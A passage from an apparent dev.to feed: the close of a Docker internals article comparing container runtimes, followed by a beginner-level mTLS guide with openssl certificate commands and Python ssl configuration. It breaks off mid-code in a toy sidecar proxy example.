&lt;p&gt;The table above captures the facts — but the &lt;em&gt;why&lt;/em&gt; behind those choices becomes clearer when you see where each tool lands on the isolation vs. performance spectrum:&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fqnnbatu9f94qyia8zo7e.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fqnnbatu9f94qyia8zo7e.png" alt="architectural trade-offs" width="800" height="67"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;h3&gt;
  
  
  12.7 When to Choose What
&lt;/h3&gt;

&lt;p&gt;The decision is not about which tool is "best" — it's about which architectural trade-off matches your threat model and operational context.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Choose Docker&lt;/strong&gt; when developer experience and ecosystem breadth matter most. Your team already knows it, your CI/CD pipelines already use it, and you need the widest tool compatibility. It remains the de facto standard for local development and remains deeply integrated into every major cloud platform.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Choose Podman&lt;/strong&gt; when security posture is the primary concern. If you're in a regulated industry, running shared CI runners where multiple teams' code executes on the same host, or deploying on immutable Linux distributions (Fedora Atomic, Silverblue, Bazzite), Podman's daemonless and rootless-by-default architecture eliminates entire categories of attack surface. Its native pod model also makes it a natural fit for teams building toward Kubernetes-native workflows.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Choose nerdctl&lt;/strong&gt; when you want to push the boundaries of what containers can do. Lazy pulling, encrypted images, P2P distribution, and cosign verification are features that don't exist in Docker today. It's also the best tool for understanding containerd's internals directly — since it bypasses dockerd entirely, you're seeing the runtime with one fewer abstraction layer.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Choose Kata Containers&lt;/strong&gt; when the shared-kernel threat model is unacceptable. Multi-tenant clouds running untrusted customer code, serverless platforms, or workloads that need compliance-grade proof of isolation all benefit from the hard VM boundary that namespaces alone cannot provide. Kata integrates cleanly into Kubernetes via the CRI interface, so it doesn't require rewriting orchestration logic.&lt;/p&gt;

&lt;p&gt;In practice, these tools coexist. A single Kubernetes cluster might run routine workloads with runc-backed containerd, security-sensitive jobs with Kata, and use Podman on developer laptops. The result is not competition but coexistence: Docker for accessibility and ecosystem, Podman for compliance, nerdctl for containerd's newest capabilities, and Kata for hard isolation. The OCI standards ensure the images are interoperable regardless of which runtime executes them.&lt;/p&gt;




&lt;h2&gt;
  
  
  13. Summary and Key Takeaways
&lt;/h2&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Ftl3osdhknrvubtq1n0kb.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Ftl3osdhknrvubtq1n0kb.png" alt="summary" width="800" height="95"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;Docker's power comes from its elegant composition of &lt;strong&gt;existing Linux primitives&lt;/strong&gt; — it invented none of the underlying technology. Mount namespaces date back to Linux 2.4.19 (2002), with PID and network namespaces landing around 2.6.24 (2008), the same release that merged cgroups. Overlay filesystems predate Docker by years.&lt;/p&gt;

&lt;p&gt;What Docker did was &lt;strong&gt;package these primitives into a developer-friendly workflow&lt;/strong&gt;: a simple CLI, a declarative image format, a global registry, and a composable networking model. The internals are surprisingly simple once you see the full picture — it's the orchestration layer on top that makes it powerful.&lt;/p&gt;

&lt;p&gt;Understanding these internals gives you the ability to:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;
&lt;strong&gt;Debug container issues&lt;/strong&gt; at the kernel level (&lt;code&gt;/proc&lt;/code&gt;, cgroup filesystem, namespace inspection)&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Optimize images&lt;/strong&gt; by understanding layer caching and CoW&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Harden security&lt;/strong&gt; by knowing exactly where the isolation boundaries are&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Choose alternatives&lt;/strong&gt; (containerd directly, Podman, kata-containers) with full knowledge of the tradeoffs&lt;/li&gt;
&lt;/ul&gt;

</description>
      <category>docker</category>
      <category>containers</category>
      <category>linux</category>
      <category>cloud</category>
    </item>
    <item>
      <title>Understanding mTLS in Cloud Environments: A Complete Guide</title>
      <dc:creator>Piyush Jajoo</dc:creator>
      <pubDate>Sun, 01 Feb 2026 15:39:35 +0000</pubDate>
      <link>https://dev.to/piyushjajoo/understanding-mtls-in-cloud-environments-a-complete-guide-3mdn</link>
      <guid>https://dev.to/piyushjajoo/understanding-mtls-in-cloud-environments-a-complete-guide-3mdn</guid>
      <description>&lt;h2&gt;
  
  
  Introduction
&lt;/h2&gt;

&lt;p&gt;In modern cloud architectures, securing communication between services is paramount. While traditional TLS (Transport Layer Security) protects data in transit, mutual TLS (mTLS) takes security a step further by requiring both parties to authenticate each other. This blog post will help you understand mTLS, how it works in cloud environments, and why it's becoming a standard practice for service-to-service communication.&lt;/p&gt;

&lt;h2&gt;
  
  
  What is mTLS?
&lt;/h2&gt;

&lt;p&gt;Mutual TLS (mTLS) is a security protocol that extends standard TLS by requiring &lt;strong&gt;both&lt;/strong&gt; the client and server to authenticate each other using digital certificates. In traditional TLS, only the server proves its identity to the client (like when you visit a website with HTTPS). With mTLS, the client must also prove its identity to the server.&lt;/p&gt;

&lt;h3&gt;
  
  
  Traditional TLS vs mTLS
&lt;/h3&gt;

&lt;p&gt;The fundamental difference between traditional TLS and mTLS is about who proves their identity. Let's compare them side by side:&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fzi7l1i5n5z602rcnnipk.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fzi7l1i5n5z602rcnnipk.png" alt="TLS vs mTLS" width="800" height="1016"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Understanding the difference:&lt;/strong&gt;&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Traditional TLS (top section):&lt;/strong&gt;&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;This is what happens when you visit a website with HTTPS (like your bank's website)&lt;/li&gt;
&lt;li&gt;The &lt;strong&gt;client&lt;/strong&gt; (your browser) initiates the connection&lt;/li&gt;
&lt;li&gt;The &lt;strong&gt;server&lt;/strong&gt; presents its certificate to prove it's the legitimate website&lt;/li&gt;
&lt;li&gt;The client verifies the certificate and says "OK, you're who you claim to be"&lt;/li&gt;
&lt;li&gt;Connection established - but notice the server never verified who the client is&lt;/li&gt;
&lt;li&gt;The server has no idea if you're a legitimate user, a bot, or an attacker (that's why you still need to log in with a password)&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;&lt;strong&gt;Mutual TLS (bottom section):&lt;/strong&gt;&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;Both parties prove their identity before establishing the connection&lt;/li&gt;
&lt;li&gt;The server still presents its certificate first (just like traditional TLS)&lt;/li&gt;
&lt;li&gt;But then the client ALSO presents its certificate&lt;/li&gt;
&lt;li&gt;The server verifies the client's certificate before allowing the connection&lt;/li&gt;
&lt;li&gt;Only after BOTH parties are verified does the encrypted connection establish&lt;/li&gt;
&lt;li&gt;This is like both people showing ID badges before entering a secure facility&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;&lt;strong&gt;Real-world analogy:&lt;/strong&gt; Traditional TLS is like calling a company - they answer "Hello, this is Acme Corporation" and you trust them. mTLS is like calling a secure government facility - they first prove who they are, and then ask "What's your employee ID number?" so that you prove who you are before the conversation continues.&lt;/p&gt;

&lt;h2&gt;
  
  
  Why mTLS Matters in Cloud Environments
&lt;/h2&gt;

&lt;p&gt;Cloud environments present unique security challenges:&lt;/p&gt;

&lt;ol&gt;
&lt;li&gt;
&lt;strong&gt;Zero Trust Networks&lt;/strong&gt;: In cloud environments, you can't rely on network perimeters for security&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Service-to-Service Communication&lt;/strong&gt;: Microservices need to authenticate each other&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Dynamic Infrastructure&lt;/strong&gt;: Services scale up and down, making IP-based security inadequate&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Compliance Requirements&lt;/strong&gt;: Many regulations require strong authentication for sensitive data&lt;/li&gt;
&lt;/ol&gt;

&lt;h2&gt;
  
  
  How mTLS Works: The Deep Dive
&lt;/h2&gt;

&lt;h3&gt;
  
  
  Certificate-Based Authentication
&lt;/h3&gt;

&lt;p&gt;At the heart of mTLS is certificate-based authentication. Think of certificates like digital passports that prove who you are. Here's how the system works:&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fagzmbdpopd4cju255k4n.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fagzmbdpopd4cju255k4n.png" alt="Certificate based authentication" width="800" height="872"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Understanding the diagram:&lt;/strong&gt;&lt;/p&gt;

&lt;ol&gt;
&lt;li&gt;&lt;p&gt;&lt;strong&gt;Certificate Authority (CA)&lt;/strong&gt; - The purple box at the top is like a trusted government agency that issues passports. The CA is responsible for creating and signing certificates for both clients and servers. Everyone trusts the CA, so if the CA says "this certificate is valid," everyone believes it.&lt;/p&gt;&lt;/li&gt;
&lt;li&gt;&lt;p&gt;&lt;strong&gt;Signing certificates&lt;/strong&gt; - When the CA "signs" a certificate, it's like putting an official stamp on a document. This signature proves the certificate is legitimate and hasn't been tampered with. The CA signs both the server's certificate and the client's certificate.&lt;/p&gt;&lt;/li&gt;
&lt;li&gt;&lt;p&gt;&lt;strong&gt;Server Side&lt;/strong&gt; (blue box) - Your application server receives a certificate from the CA and installs it. This certificate contains the server's identity (like its domain name) and a public key. It's the server's way of proving "I am who I say I am."&lt;/p&gt;&lt;/li&gt;
&lt;li&gt;&lt;p&gt;&lt;strong&gt;Client Side&lt;/strong&gt; (green box) - Similarly, the client (which could be another microservice, an application, or any service making requests) also gets its own certificate from the CA. This is what makes mTLS "mutual" - the client also has to prove its identity.&lt;/p&gt;&lt;/li&gt;
&lt;li&gt;&lt;p&gt;&lt;strong&gt;The exchange&lt;/strong&gt; - When they connect, both the client and server present their certificates to each other. Each one checks the other's certificate against the CA to verify it's legitimate. It's like two people showing each other their passports before having a conversation.&lt;/p&gt;&lt;/li&gt;
&lt;/ol&gt;

&lt;p&gt;This mutual verification ensures that both parties are authentic before any sensitive data is exchanged.&lt;/p&gt;
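&lt;p&gt;The entire trust setup above can be reproduced with &lt;code&gt;openssl&lt;/code&gt; in a few commands. This is a minimal sketch with illustrative names, a single root CA, and no intermediate CAs:&lt;/p&gt;

```shell
# 1. The CA: a self-signed root certificate (the "passport office")
openssl req -x509 -newkey rsa:2048 -nodes -days 365 \
  -keyout ca.key -out ca.crt -subj "/CN=demo-ca"

# 2. Server: key + signing request, then the CA signs it
openssl req -newkey rsa:2048 -nodes \
  -keyout server.key -out server.csr -subj "/CN=my-service"
openssl x509 -req -in server.csr -CA ca.crt -CAkey ca.key \
  -CAcreateserial -days 365 -out server.crt

# 3. Client: the same dance -- "mutual" really is symmetric
openssl req -newkey rsa:2048 -nodes \
  -keyout client.key -out client.csr -subj "/CN=my-client"
openssl x509 -req -in client.csr -CA ca.crt -CAkey ca.key \
  -CAcreateserial -days 365 -out client.crt

# 4. Either side can now verify the other against the CA
openssl verify -CAfile ca.crt server.crt client.crt
```

&lt;p&gt;The last command should report &lt;code&gt;OK&lt;/code&gt; for both certificates; verifying against anything other than &lt;code&gt;ca.crt&lt;/code&gt; fails, which is exactly the check each peer performs during the handshake.&lt;/p&gt;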

&lt;h3&gt;
  
  
  The mTLS Handshake Process
&lt;/h3&gt;

&lt;p&gt;Now let's walk through what actually happens when a client and server establish an mTLS connection. This process is called a "handshake" because it's like two people introducing themselves and agreeing on how to communicate securely.&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fqiunc3xugv7dxqhuh482.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fqiunc3xugv7dxqhuh482.png" alt="mTLS handshake process" width="800" height="665"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Breaking down the handshake step-by-step:&lt;/strong&gt;&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Step 1: ClientHello&lt;/strong&gt; - The client initiates the conversation by sending a "hello" message to the server. This message includes:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;Which version of TLS the client supports (like saying "I speak TLS 1.3")&lt;/li&gt;
&lt;li&gt;A list of cipher suites (encryption methods) the client can use (like offering multiple languages to communicate in)&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;&lt;strong&gt;Step 2: ServerHello + Certificates&lt;/strong&gt; - The server responds with three important pieces:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;
&lt;strong&gt;ServerHello&lt;/strong&gt;: The server picks a TLS version and cipher suite that both parties support&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Server Certificate&lt;/strong&gt;: The server presents its digital certificate (its passport)&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;CertificateRequest&lt;/strong&gt;: This is the key difference from regular TLS! The server asks the client "show me YOUR certificate too"&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;&lt;strong&gt;Steps 3-4: Client validates server&lt;/strong&gt; - Before proceeding, the client performs critical security checks:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;The client sends the server's certificate to the Certificate Authority (CA) for verification&lt;/li&gt;
&lt;li&gt;The CA checks: Is this certificate signed by me? Is it still valid? Has it been revoked?&lt;/li&gt;
&lt;li&gt;The CA responds with "Certificate Valid ✓" if all checks pass&lt;/li&gt;
&lt;li&gt;This verification happens in milliseconds&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;&lt;strong&gt;Step 5: Client sends its certificate&lt;/strong&gt; - If the server's certificate checks out, the client responds with:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;
&lt;strong&gt;Client Certificate&lt;/strong&gt;: The client's own digital certificate proving its identity&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;ClientKeyExchange&lt;/strong&gt;: Information needed to create the encryption keys for the session&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;&lt;strong&gt;Steps 6-7: Server validates client&lt;/strong&gt; - Now it's the server's turn to verify the client:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;The server sends the client's certificate to the Certificate Authority for verification&lt;/li&gt;
&lt;li&gt;The CA checks: Is this certificate signed by me? Is it valid? Not revoked?&lt;/li&gt;
&lt;li&gt;The CA responds with "Certificate Valid ✓" &lt;/li&gt;
&lt;li&gt;Only after this verification does the server accept the client&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;&lt;strong&gt;Steps 8-9: Final confirmation&lt;/strong&gt; - Both parties send "ChangeCipherSpec" and "Finished" messages:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;These messages are encrypted using the agreed-upon encryption method&lt;/li&gt;
&lt;li&gt;They confirm that both sides have the same encryption keys&lt;/li&gt;
&lt;li&gt;This is the final handshake before secure communication begins&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;&lt;strong&gt;Steps 10-11: Secure communication&lt;/strong&gt; - With mutual authentication complete:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;All data exchanged is now fully encrypted&lt;/li&gt;
&lt;li&gt;Both parties have verified each other's identities through the CA&lt;/li&gt;
&lt;li&gt;The connection is secure and ready for application data&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;&lt;strong&gt;Important note about CA verification:&lt;/strong&gt; In practice, the CA verification often happens locally using a cached list of trusted CA certificates and Certificate Revocation Lists (CRLs) or using OCSP (Online Certificate Status Protocol). The diagram shows it as a separate call for clarity, but this verification is what makes the "trusted CA" concept work.&lt;/p&gt;

&lt;p&gt;This entire process adds only one or two extra network round trips - typically a few milliseconds on a local network, tens of milliseconds across the internet - but it establishes a secure, mutually authenticated connection that protects against eavesdropping, man-in-the-middle attacks, and impersonation.&lt;/p&gt;
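&lt;p&gt;The handshake above maps directly onto Python's standard &lt;code&gt;ssl&lt;/code&gt; module. The sketch below (the file paths are placeholders you would point at real certificate, key, and CA bundle files) shows that the only configuration difference between ordinary TLS and mTLS on the server side is one setting: &lt;code&gt;verify_mode = CERT_REQUIRED&lt;/code&gt;, which makes the server demand and validate a client certificate.&lt;/p&gt;

```python
import ssl

def mtls_server_context(cert_file=None, key_file=None, ca_file=None):
    """Server side: present our own certificate AND demand one from the client."""
    ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_SERVER)
    ctx.minimum_version = ssl.TLSVersion.TLSv1_2
    # This single line turns ordinary TLS into mutual TLS:
    ctx.verify_mode = ssl.CERT_REQUIRED
    if cert_file:
        ctx.load_cert_chain(cert_file, key_file)  # our identity (step 2)
    if ca_file:
        ctx.load_verify_locations(ca_file)        # the CA we trust to vouch for clients
    return ctx

def mtls_client_context(cert_file=None, key_file=None, ca_file=None):
    """Client side: verify the server (steps 3-4) AND present our own
    certificate when asked (step 5)."""
    ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)  # server verification on by default
    ctx.minimum_version = ssl.TLSVersion.TLSv1_2
    if cert_file:
        ctx.load_cert_chain(cert_file, key_file)
    if ca_file:
        ctx.load_verify_locations(ca_file)
    return ctx
```

&lt;p&gt;Note that the client context verifies the server and checks hostnames by default - mTLS only adds the client's own certificate on top of that.&lt;/p&gt;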

&lt;h2&gt;
  
  
  mTLS in Cloud Architectures
&lt;/h2&gt;

&lt;h3&gt;
  
  
  Microservices Communication
&lt;/h3&gt;

&lt;p&gt;In a typical cloud microservices architecture, mTLS ensures that only authorized services can communicate with each other. Let's look at how this works in practice:&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fvie4718ja6lq2d2b0aky.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fvie4718ja6lq2d2b0aky.png" alt="microservices communication" width="800" height="325"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Breaking down the architecture:&lt;/strong&gt;&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;External User Connection:&lt;/strong&gt;&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;Regular users (from web browsers or mobile apps) connect using standard &lt;strong&gt;HTTPS/TLS&lt;/strong&gt;
&lt;/li&gt;
&lt;li&gt;Users don't need certificates - they authenticate with usernames/passwords or tokens&lt;/li&gt;
&lt;li&gt;Only the API Gateway proves its identity to the user (one-way TLS)&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;&lt;strong&gt;API Gateway (red box):&lt;/strong&gt;&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;Acts as the entry point to your cloud application&lt;/li&gt;
&lt;li&gt;Handles external TLS connections from users&lt;/li&gt;
&lt;li&gt;Converts to mTLS for all internal service communications&lt;/li&gt;
&lt;li&gt;This is the boundary between the untrusted internet and your trusted service mesh&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;&lt;strong&gt;Service Mesh (gray box):&lt;/strong&gt;&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;Contains all your microservices (Auth, Order, Payment, etc.)&lt;/li&gt;
&lt;li&gt;Every service-to-service communication inside requires mTLS&lt;/li&gt;
&lt;li&gt;Think of it as a secure internal network where everyone must show ID&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;&lt;strong&gt;Internal mTLS Connections (solid arrows):&lt;/strong&gt;&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;
&lt;strong&gt;API → Auth&lt;/strong&gt;: When a user request comes in, the API Gateway must verify the user's credentials with the Auth Service&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;API → Order&lt;/strong&gt;: To place an order, the API Gateway calls the Order Service&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Order → Payment&lt;/strong&gt;: The Order Service needs to process payment&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Payment → DB&lt;/strong&gt;: The Payment Service securely stores transaction data&lt;/li&gt;
&lt;li&gt;Every one of these connections requires both parties to authenticate with certificates&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;&lt;strong&gt;Certificate Manager (yellow box):&lt;/strong&gt;&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;Cloud-native service (AWS Certificate Manager, Google Certificate Authority Service, etc.)&lt;/li&gt;
&lt;li&gt;Automatically issues certificates to each microservice&lt;/li&gt;
&lt;li&gt;Handles certificate rotation before they expire (dotted lines show this automated process)&lt;/li&gt;
&lt;li&gt;Without this automation, managing hundreds of certificates would be overwhelming&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;&lt;strong&gt;Why this architecture matters:&lt;/strong&gt;&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;If an attacker compromises one service, they still can't impersonate other services without valid certificates&lt;/li&gt;
&lt;li&gt;Each service only trusts certificates signed by your Certificate Manager&lt;/li&gt;
&lt;li&gt;Network location doesn't matter - a service can't connect just because it's "inside" the cloud&lt;/li&gt;
&lt;li&gt;This is the foundation of "zero trust" security&lt;/li&gt;
&lt;/ul&gt;
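&lt;p&gt;Once mTLS gives every caller a cryptographically verified identity (the name in its certificate), a service can enforce who may call it with a simple allow-list. The sketch below uses hypothetical service names matching the diagram; real meshes express the same idea with authorization policies rather than hand-written code.&lt;/p&gt;

```python
# Hypothetical allow-list: which verified peer identities may call each service.
# Identities follow Kubernetes-style DNS names, e.g.
# "order-service.prod.svc.cluster.local".
ALLOWED_CALLERS = {
    "payment-service": {"order-service"},
    "order-service": {"api-gateway"},
    "auth-service": {"api-gateway"},
}

def authorize(target_service, peer_identity):
    """peer_identity is the name mTLS verified from the caller's certificate.
    Network location is ignored entirely: only the cryptographically proven
    identity matters, which is the zero-trust principle in one function."""
    caller = peer_identity.split(".")[0]
    return caller in ALLOWED_CALLERS.get(target_service, set())
```

&lt;p&gt;So a compromised Cart Service still cannot reach the Payment Service: &lt;code&gt;authorize("payment-service", "cart-service.prod.svc.cluster.local")&lt;/code&gt; is false, because its certificate names it as &lt;code&gt;cart-service&lt;/code&gt; and forging a different identity would require another service's private key.&lt;/p&gt;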

&lt;h3&gt;
  
  
  Cloud-Native Implementation Layers
&lt;/h3&gt;

&lt;p&gt;Understanding how mTLS is implemented in cloud environments requires looking at the different layers that work together. This diagram shows the typical architecture stack:&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fs5iveh0typpjcc4n9or4.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fs5iveh0typpjcc4n9or4.png" alt="Cloud native implementation layers" width="800" height="641"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Understanding each layer:&lt;/strong&gt;&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Application Layer (top):&lt;/strong&gt;&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;These are your actual microservices - the business logic you write&lt;/li&gt;
&lt;li&gt;Microservice A, B, and C could be your user service, order service, payment service, etc.&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Key insight&lt;/strong&gt;: Your application code doesn't need to know about mTLS at all!&lt;/li&gt;
&lt;li&gt;Developers can focus on business logic without writing security code&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;&lt;strong&gt;Service Mesh Layer:&lt;/strong&gt;&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;Each microservice gets a "sidecar proxy" (usually Envoy)&lt;/li&gt;
&lt;li&gt;Think of the proxy as a security guard attached to each microservice&lt;/li&gt;
&lt;li&gt;The proxy handles all incoming and outgoing network traffic&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;This is where mTLS actually happens&lt;/strong&gt; - the proxies do all the certificate work&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;&lt;strong&gt;Proxy-to-Proxy Communication (bidirectional arrows):&lt;/strong&gt;&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;When Microservice A wants to talk to Microservice B, the traffic goes through their proxies&lt;/li&gt;
&lt;li&gt;Proxy1 and Proxy2 establish an mTLS connection&lt;/li&gt;
&lt;li&gt;The microservices themselves just see regular unencrypted traffic (localhost communication)&lt;/li&gt;
&lt;li&gt;This pattern is called "transparent encryption"&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;&lt;strong&gt;Control Plane (blue box):&lt;/strong&gt;&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;The brain of the service mesh (Istio, Linkerd, etc.)&lt;/li&gt;
&lt;li&gt;Configures all the proxies with routing rules and security policies&lt;/li&gt;
&lt;li&gt;Tells each proxy which certificates to use&lt;/li&gt;
&lt;li&gt;Monitors the health of all connections&lt;/li&gt;
&lt;li&gt;You can think of it as the air traffic controller for your microservices&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;&lt;strong&gt;Certificate Management Layer:&lt;/strong&gt;&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;
&lt;strong&gt;Internal CA&lt;/strong&gt;: Your own Certificate Authority that issues certificates for your services&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Auto-rotation&lt;/strong&gt;: Automatically renews certificates before they expire (maybe every 24 hours)&lt;/li&gt;
&lt;li&gt;This automation is critical - manually managing hundreds of certificates would be impossible&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;&lt;strong&gt;Cloud Infrastructure Layer (bottom):&lt;/strong&gt;&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;
&lt;strong&gt;Kubernetes Cluster&lt;/strong&gt;: Orchestrates all your containers and services&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Secret Store&lt;/strong&gt;: Securely stores private keys and certificates&lt;/li&gt;
&lt;li&gt;Examples: AWS Secrets Manager, Google Cloud Secret Manager, Azure Key Vault&lt;/li&gt;
&lt;li&gt;The secret store ensures private keys are never exposed in code or config files&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;&lt;strong&gt;How it all works together:&lt;/strong&gt;&lt;/p&gt;

&lt;ol&gt;
&lt;li&gt;Kubernetes starts up your microservices&lt;/li&gt;
&lt;li&gt;The Service Mesh Control Plane deploys a proxy alongside each microservice&lt;/li&gt;
&lt;li&gt;The CA generates certificates for each service and stores them in the Secret Store&lt;/li&gt;
&lt;li&gt;The Control Plane retrieves certificates and configures each proxy&lt;/li&gt;
&lt;li&gt;When services communicate, their proxies handle mTLS automatically&lt;/li&gt;
&lt;li&gt;Certificates rotate regularly without any application downtime&lt;/li&gt;
&lt;li&gt;Developers deploy code without worrying about any of this security machinery&lt;/li&gt;
&lt;/ol&gt;

&lt;p&gt;This layered approach means &lt;strong&gt;mTLS is invisible to application developers&lt;/strong&gt; while still providing robust security for every service-to-service connection.&lt;/p&gt;
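&lt;p&gt;The "transparent encryption" idea can be captured in a deliberately simplified toy model: the application hands plaintext to its local proxy, the proxies secure the wire, and a peer without a valid certificate cannot connect at all. A real sidecar (Envoy) performs an actual mTLS handshake; the string reversal below is only a stand-in for encryption on the wire.&lt;/p&gt;

```python
class SidecarProxy:
    """Toy model of a sidecar proxy doing transparent encryption."""

    def __init__(self, service_name, cert_ok=True):
        self.service_name = service_name
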